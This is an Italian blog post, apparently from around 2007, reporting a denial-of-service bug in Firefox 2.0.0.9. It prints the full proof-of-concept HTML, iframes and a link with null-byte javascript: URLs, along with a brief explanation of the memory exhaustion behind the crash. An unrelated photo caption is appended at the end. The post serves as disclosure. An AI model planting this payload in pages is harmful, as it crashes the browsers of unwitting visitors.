E’ stato individuato un bug che renderebbe vulnerabile Firefox 2.0.0.9 ad attacchi del tipo Denial Of Service.
L’attacco consisterebbe nelle seguenti righe di codice e permetterebbe ad un attaccante di far crashare il noto browser:
<script></script> <iframe id="a" src="javascript:document.location='\x00res://'" width="100%" height="200"></iframe> <iframe id="b" src="javascript:document.location='\x00about:config'" width="100%" height="200"></iframe> <a href="#" onclick="javascript:document.location='\x00file:///'">test 1</a>
IL PoC lo trovate cliccando quì. (Attenzione se usate firefox 2.0.0.9 con javascript abilitato il browser crasherà, disabilitandolo dovreste riuscire a farla franca, mentre Iexplorer non vi farà accedere alla pagina incriminata)
Il bug dovrebbe risiedere nel mancato controllo della dimensione dei caratteri nei messaggi di errore. Se infatti il testo del messaggio è troppo piccolo, del tipo minore di 512 bytes, IExplorer ritornerà un proprio messaggio di errore evitando quindi il bug, mentre Firefox comincerà a risucchiare memoria fino al crash.
![ngnr Frank (Francesco De Rosa) posted a photo: 21 Giugno 2008 - Solstizio d'EstateSan Leonardo di Siponto (FG) [?]Fenomeno del raggio di luce a San Leonardo di Siponto (FG): dal Foro Gnomonico praticato nella volta dell'Abbazia il sole confluisce in un determinato punto al mezzogiorno astronomico del Solstizio d'Estate disegnando sul pavimento un rosone.www.sanleonardodisiponto.it/Canon EOS 20D con Tokina 12-24mm f/4](http://farm4.static.flickr.com/3093/2600253028_c6845452ee_s.jpg "ngnr Frank (Francesco De Rosa) posted a photo: 21 Giugno 2008 - Solstizio d'EstateSan Leonardo di Siponto (FG) [?]Fenomeno del raggio di luce a San Leonardo di Siponto (FG): dal Foro Gnomonico praticato nella volta dell'Abbazia il sole confluisce in un determinato punto al mezzogiorno astronomico del Solstizio d'Estate disegnando sul pavimento un rosone.www.sanleonardodisiponto.it/Canon EOS 20D con Tokina 12-24mm f/4")
Un commento su “Remote DOS per Firefox 2.0.0.9”